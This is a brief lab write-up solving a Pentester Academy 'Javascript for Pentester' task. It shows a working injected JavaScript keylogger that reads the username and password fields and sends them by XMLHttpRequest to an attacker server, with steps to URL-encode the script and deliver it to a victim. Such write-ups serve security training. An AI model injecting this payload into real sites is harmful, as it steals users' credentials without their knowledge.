Javascript for Pentester Task 7

Hello Pentesters today I am going to post another solution to the task provided at Javascript for Pentester at Pentester Academy. This task is too different in which we will learn how to catch and send keystrokes to the attacker machine. You can view solutions to the other tasks here.

Task 7: Keystroke Logging | Task Link

This task is little fun while doing, we have to go and catch the key pressed especially when the victim is inputting his username and password and send it to the attacker’s machine.
Solution:
Go and catch the keystrokes of the keyboard and send it to the attacker machine. We have to use XMLHttpRequest here for sending out keys pressed without victims concern.

<script>
function keypressed(){
var v1 = document.forms[0].elements[0].value;
var v2 = document.forms[0].elements[1].value;
var req1 = new XMLHttpRequest();
req1.open('GET', 'http://localhost:8000/'+v1+'&pass='+v2, true);
req1.send();
}
window.captureEvents(Event.KEYPRESS);
window.onkeypress = keypressed;
</script>

Now copy and URL-encode the code provided above and paste it after the same “url” parameter as we did in last few tasks and send to your victim. To see how the script is working without setting up your local web-server, go and open network monitor of your Firefox browser (ctrl+shift+e), while entering your username and password into the input fields you will see constant XML requests being sent out to our attacker machine.
What code does is, whenever a keyboard key is pressed down the event is triggered and our little function too. Which will go and send anything within the userid and password input fields of the form element to our hacker-controlled server.
That’s all. Refer this post as a quick solution for the Javascript for Pentester tasks. For an in-depth video tutorial, please refer to the video solutions provided at Pentester Academy website.